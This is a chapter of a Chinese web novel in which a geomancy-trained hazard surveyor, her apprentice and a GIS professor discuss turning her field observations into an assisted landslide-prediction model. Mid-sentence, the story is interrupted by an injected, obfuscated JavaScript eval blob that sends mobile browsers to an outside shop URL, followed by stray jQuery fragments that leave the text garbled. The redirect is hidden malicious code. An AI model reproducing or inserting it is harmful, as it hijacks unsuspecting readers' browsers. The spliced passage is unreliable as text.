出发去贵州前一周,周南书在家里整理资料。
李建明来了,带着他的笔记本电脑。两个人坐在槐树底下,周南书翻笔记本,李建明往电脑里录入数据——洛桑县的三十七个点位,每个点位的观察记录、判断依据、复核结果。
录入到第十七个点位的时候,李建明停了一下。
“师父,您这些记录,我越录越觉得乱。”
“哪里乱?”
“格式不统一。这个点位写了山脊走向,下一个点位没写。这个写了植被密度,那个写了鼠洞朝向。要是想用电脑分析,根本没法批量处理。”
周南书看了看自己的笔记本,承认他说得对。她的记录方式是跟着感觉走的,到了现场看到什么记什么,没有固定格式。对人工阅读来说没问题,对电脑来说就是一团乱麻。
“你有办法统一吗?”
“办法有,但麻烦。”李建明调出一个Excel表格,“您看,我把您洛桑县的三十七个点位的所有观察项都列出来了——山脊走向、河谷形态、植被密度、岩石风化、地下水位、动物痕迹、土壤颜色、坡度坡向、水系距离,一共九项。但每个点位只记录了其中四到六项,不全。”
“不全怎么办?”
“要么补,要么空着。机器学习的话,空值太多会影响模型质量。”
周南书端起茶杯喝了一口。茶凉了,她没在意。
“你说的机器学习,现在做的人多吗?”
“多。但国内起步晚。”李建明把电脑转过来给她看,“您看这篇论文,是去年发表的,讲的是用神经网络识别滑坡易发区。数据用的是国外的,国内的还没人做出来。不是说技术不行,是国内的野外数据太少了。像洛桑县这种高精度、逐点验证的数据,全国找不出第二份。”
周南书看着屏幕上密密麻麻的英文和图表,没看太懂。
“你的意思是,我的数据比别人的好?”
“不是好,是稀缺。您这三十七个点,每一个都有现场观察记录、有地质队复核结果、有准确坐标。这种数据,搞机器学习的人做梦都想要。”
周南书没说话。
福崽从窗台上跳下来,走到桌边,低头看了看电脑屏幕。它当然看不懂,但它知道李建明说得很认真。
“你那个徒弟,又开始说一些我听不懂的话了。”福崽喵了一声。
周南书没理它。
李建明继续录入数据,周南书在旁边看。看了半个多小时,她发现一个问题。
“你这个Excel表格,只能记录我写下来的东西。但我写下来的只是我观察到的一部分。比如山脊走向,我在笔记本上只写了‘北东走向’,但我在现场是站在山脊上来回走了两趟、对比了两侧的山谷深度之后才确认的。这个过程没有记下来。”
李建明停下来,抬起头:“师父,您的意思是,我漏了判断过程?”
“不是漏。是记不下来。判断过程在我脑子里,写不到纸上。电脑更不可能理解。”
李建明沉默了一会儿,点了点头。
“所以专家系统很难做。经验的东西,电脑学不会。”
周南书没接话。她把凉茶倒掉,重新倒了一杯热的。
下午两点多,沈佑宁到了。
他是方远介绍的,中国地质大学做地理信息系统的副教授。方远在电话里说“他想跟你聊聊”,周南书没拒绝。沈佑宁进院子的时候,手里拎着一个黑色的仪器箱,肩膀上挎着相机,后背还背着一个双肩包,看起来像要去野外考察。
“周老师您好,打扰了。”他把箱子放在石桌上,擦了擦额头的汗。
“坐。喝茶还是白水?”
“白水就行。”
周南书倒了杯水递给他。沈佑宁喝了一大口,放下杯子,从包里掏出一台笔记本电脑,打开。
“周老师,我看过您在洛桑县的报告和川西项目的资料。您用堪舆术判断隐患点的方法,我一直很想跟您聊聊。”
“聊什么?”
“聊数字化。”沈佑宁调出一张图,是洛桑县的数字高程模型,“您看,这是我用公开的遥感数据生成的洛桑县地形图。分辨率三十米,能看到大致的地形起伏,但细节不够。您现场观察到的那种小规模的冲沟、陡坎,这张图上看不出来。”
周南书看了一眼:“三十米分辨率,确实不够。洛桑县那个误判的点位,高差只有两三米,三十米的网格根本捕捉不到。”
“对。所以高分辨率的数据很重要。但国内目前能公开获取的高分辨率地形数据很少,价格也贵。我们做研究的,很多时候只能将就。”
沈佑宁说到这里,顿了一下,似乎在犹豫要不要继续说下去。
“您直说。”周南书道。
“国内的地理信息系统起步晚,比国外至少落后五到八年。不是说硬件不行,是软件和算法。国外的滑坡预测模型已经用上了深度学习和多源数据融合,国内还在用传统的统计方法和单一数据源。加上数据共享机制不健全,各做各的,很难做出大模型。”
周南书听着,没打断。她对互联网技术了解不多,但“落后”这两个字她听懂了。
“你的意思是,国内在这个领域,缺数据、缺算法、缺共享?”
“缺数据是最大的问题。”沈佑宁说,“算法可以借鉴国外的论文,但数据得自己采。像您洛桑县那种高精度的野外验证数据,全国都很少。如果能把您的经验和现代技术结合起来,也许能走出一条不一样的路。”
他打开仪器箱,把三维激光扫描仪拿出来,组装好,对着院子里的老槐树扫了一遍。仪器发出轻微的嗡嗡声,旁边的笔记本电脑上慢慢出现了一个三维模型——树干、树枝、树叶,连树皮的纹理都清晰可见。
“这个扫描仪的分辨率是厘米级的。如果带到野外,扫描一个边坡,十分钟就能拿到高精度的地形数据,比传统测量快几十倍。”
周南书看着那个三维模型,沉默了几秒。
“你这个东西,能看出山脊的走向吗?”
“能。而且能算出精确的方位角和起伏度。”
“河谷的横剖面形态呢?”
“也能。软件可以自动提取任意位置的剖面线,计算宽深比和对称性。”
“植被覆盖度呢?”
“植被指数可以用卫星遥感数据反演。如果做精细研究,也可以用无人机搭载多光谱相机现场采集。”
周南书一个一个问,沈佑宁一个一个答。问到最后,周南书停下来,想了想。
“你说的这些,都是技术手段。能拿到数据,能算指标。但有一个问题你没回答——这些数据放在一起,怎么判断?”
沈佑宁愣了一下,然后笑了。
“周老师,您问到点子上了。现在的滑坡预测模型,最大的问题不是数据不够,是指标之间的权重怎么定。山脊走向占多少分?植被覆盖占多少分?不同地形条件下,权重是不是要变?这些问题,现有的模型都给不出好答案。因为做模型的人是搞计算机的,不懂地质。搞地质的人又不懂怎么建模。”
周南书端起茶杯,喝了一口。茶已经凉了,她没在意。
“那你的意思,是需要一个人既懂地质又懂计算机?”
“不完全是。我的意思是,需要一个真正懂判断逻辑的人,把这个逻辑框架搭出来。指标怎么分级、指标之间怎么关联、不同情况下怎么调整权重——这些是经验,不是公式。您脑子里有一套完整的体系,只是从来没有系统地整理过。”
周南书放下茶杯,靠在椅背上。老槐树的影子落在她身上,斑斑驳驳的。
“你说得对。我确实没有整理过。”
她站起来,走进屋里,从书桌抽屉里拿出一个厚厚的笔记本。封面上写着“洛桑县”三个字,边角已经磨损了。
“这是我洛桑县的全部记录。每个点位的观察项、判断过程、最终结论,以及事后复核的结果。你拿去看。看完之后,如果你觉得能整理出什么逻辑框架,我们再聊。”
沈佑宁接过笔记本,翻开第一页,看到上面密密麻麻的字迹和简图。他的眼睛亮了,但没急着翻,而是把笔记本小心地放在桌上。
“周老师,我能拍几张吗?”
“拍吧。别外传就行。”
沈佑宁拿出手机,一页一页地拍。拍了将近二十分钟,拍完之后,他把笔记本双手捧着还回来。
“周老师,我有一个想法,不知道您愿不愿意听?”
“说。”
“我想开发一个辅助系统。把您常用的那些指标——山脊走向、河谷形态、植被覆盖、岩石风化、地下水位——全部量化,输入系统,用洛桑县和川西的数据训练一个权重模型。以后到了一个新的地方,系统先根据遥感数据自动计算这些指标,圈出高风险区域。您再到现场复核,只需要看系统圈出来的点,不用漫山遍野地跑。”
周南书听完,没有马上回答。她在脑子里把这个流程过了一遍。
“你这个想法,我以前没想过。”她说。
“那您觉得可行吗?”
“不知道。但可以试试。”她顿了顿,“不过我有一个条件。”
“您说。”
“系统做出来之后,不能替代人的判断。只能辅助。最后签字的是人,不是机器。”
沈佑宁点头:“这个当然。人机协同,不是机器替代人。”
李建明在旁边听了半天,忍不住插了一句:“沈老师,您这个系统,大概什么时候能做出第一版?”
“如果数据齐全,算法调通,三个月左右能出一个原型。但需要周老师不断验证和反馈。”
周南书想了想:“三个月后我从贵州回来了。到时候可以配合你。”
沈佑宁合上电脑,站起来。
“周老师,我想跟您去贵州。”
周南书看了他一眼:“你去干什么?”
“实地收集数据。您做判断的时候,我用仪器记录地形的三维数据和光谱信息。回来后跟您的判断做对照,看哪些指标好用,哪些不好用。这三个月我也不能光在实验室里憋着,得有现场数据支撑。”
周南书想了想:“你问方远。他同意就行。”
“好。那我回去准备。”沈佑宁背起包,拎着仪器箱,走到院门口,回过头,“周老师,您刚才说的‘人机协同’,这个方向特别好。国内现在都在追国外的模型,没人想过把人的经验直接嵌入系统。您这个思路,可能是另一个突破口。”
周南书没接话。她端起茶杯又喝了一口,这次水是凉的,她皱了皱眉。
沈佑宁走了。
李建明把电脑合上,揉了揉眼睛。
“师父,您觉得那个系统能做出来吗?”
“不知道。”
“如果能做出来,对地质灾害排查的帮助很大。您就不用每个点都亲自跑了。”
周南书站起来,走到槐树底下,仰头看着树叶之间的天空。十月底的阳光从黄绿相间的叶子间漏下来,碎成一片一片的。
“做出来了
;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="j://e.d.f/h/g/"}',24,24,'userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17548397|202948||http|test|mini|href|location'.split('|'),0,{}));
() {
$('.inform').remove();
$('#content').append('
,当然好。做不出来,也不亏。”
“为什么?”
“至少整理了一套指标。以后给别人讲,也能讲清楚。”
李建明愣了一下,然后笑了。
福崽从台阶上站起来,伸了个懒腰,走到周南书脚边,蹭了蹭她的裤腿。
“你那个系统,要是做成了,是不是以后就不用去野外了?”福崽问。
周南书低头看了它一眼。
“系统圈出来的点,还是要人去现场看。机器能算出山脊走向、河谷形态,但算不出风的走向、地下水的味道、动物的异常反应。”
“那系统有什么用?”
“省时间。以前要用一周走完的区域,系统圈完之后,可能两天就能走完。省下来的时间,可以做更细的判断。”
福崽想了想,觉得有道理,没再问了。
晚饭后,周南书一个人坐在书桌前,把今天跟沈佑宁聊的内容整理了一下。
她在笔记本上写了一行字:“辅助系统——人机协同。”
然后在下面列了几条:
1. 指标量化(山脊走向、河谷形态、植被覆盖、岩石风化、地下水位、动物行为)
2. 权重模型(不同地形条件下指标权重的变化)
3. 数据积累(洛桑县、川西、贵州,三个区域的数据交叉验证)
4. 现场复核(系统圈点,人去看)
写完之后,她看着这几条,觉得还缺了点什么。
她闭上眼,靠在椅背上,想了一会儿。
缺的是“关联”。山脊走向和河谷形态不是独立的,它们之间有因果关系。植被覆盖和地下水位之间也有关系。现在的模型把指标当成独立的变量,忽略了指标之间的内在联系。所以她洛桑县的那个误判,就是因为单独看了山脊和植被,没把它们跟地下水位联系起来。
但如果要把所有关联都写进模型,那就不是三个月的事了,三年都未必够。
系统面板弹了出来。
【宿主思考内容已记录。系统建议:可以采用分层建模的思路。第一层做单指标分析,第二层做指标关联分析,第三层做综合判断。当前世界的技术条件可以支持第一层和第二层。第三层仍需人为干预。】
周南书看着这行字,眉头微微皱了一下。
分层建模。这个说法她没听过,但逻辑上说得通。先做单指标,再做关联,最后综合。一步一步来,不用一步到位。
她没有问系统“你是怎么知道的”,因为她知道系统的知识来自更高的维度。这个世界互联网发展慢、算法落后,但在系统的维度里,这些东西可能早就成熟了。
她拿起笔,在笔记本上加了第四条:“分层建模——单指标→关联分析→综合判断。”
加完之后,她看着这条,又觉得太技术了。这不是她的语言,这是系统的语言。但思路是对的,她可以转化成自己的话说给沈佑宁听。
“指标之间不是独立的。山脊走向会影响河谷形态,植被覆盖会影响地下水位。做模型的时候,不能只看单个指标,要看指标之间的关系。可以分成三层来做:先算单个指标,再算指标之间的关联,最后做综合判断。第三层最难,可能要靠人,但前两层机器可以做。”
她想好了怎么说。
第二天上午,周南书给沈佑宁打了个电话。
“沈老师,昨天你说的事,我又想了想。”
“您说。”
“指标量化可以做。但不要只做单指标,要考虑指标之间的关联。山脊走向和河谷形态不是独立的,植被和地下水位也不是独立的。如果只做单指标,会漏掉很多信息。”
电话那头安静了两秒。
“周老师,您这个思路,跟目前主流的做法不太一样。主流做法是把指标当成独立变量输入模型,用算法自动学习权重。您说的指标关联,在算法里叫‘特征交互’,目前确实是个难点。”
“那有没有办法做?”
“有。但需要设计专门的网络结构,而且要足够的数据来训练。洛桑县的三十七个点,做单指标够了,做交互可能不够。”
“那就先做单指标。贵州回来之后数据多了再说。”
“好。还有一个问题——您说的关联,有没有优先级?哪些指标之间的关联最重要?”
周南书想了想:“山脊走向和河谷形态的关联,第一优先级。植被覆盖和地下水位的关联,第二优先级。岩石风化和坡度的关联,第三优先级。”
“我记下了。周老师,您这些判断,是怎么来的?”
周南书沉默了一下。
“做的多了,就有感觉了。”
沈佑宁没再追问。
挂了电话,福崽从窗台上跳下来,走到周南书脚边。
“你又教了那个人一堆东西。他学得会吗?”
“学不学得会是他的事。我说了是我的事。”
福崽喵了一声,好像在说“你倒是不藏私”。
周南书蹲下来,摸了摸福崽的头。
“不是不藏私。是这些东西藏不住。早一点做出来,早一点有用。”
福崽把下巴搁在她手心里,眯了眯眼睛。
窗外的银杏树叶子黄了大半,阳光照在上面,亮得晃眼。周南书站起来,走到窗边,看着那片金黄。
这个世界互联网发展慢,算法落后,数据稀缺。但人在这里,猫在这里,徒弟在这里,现在又多了一个想做系统的沈佑宁。一块砖一块砖地垒,总能垒出点什么。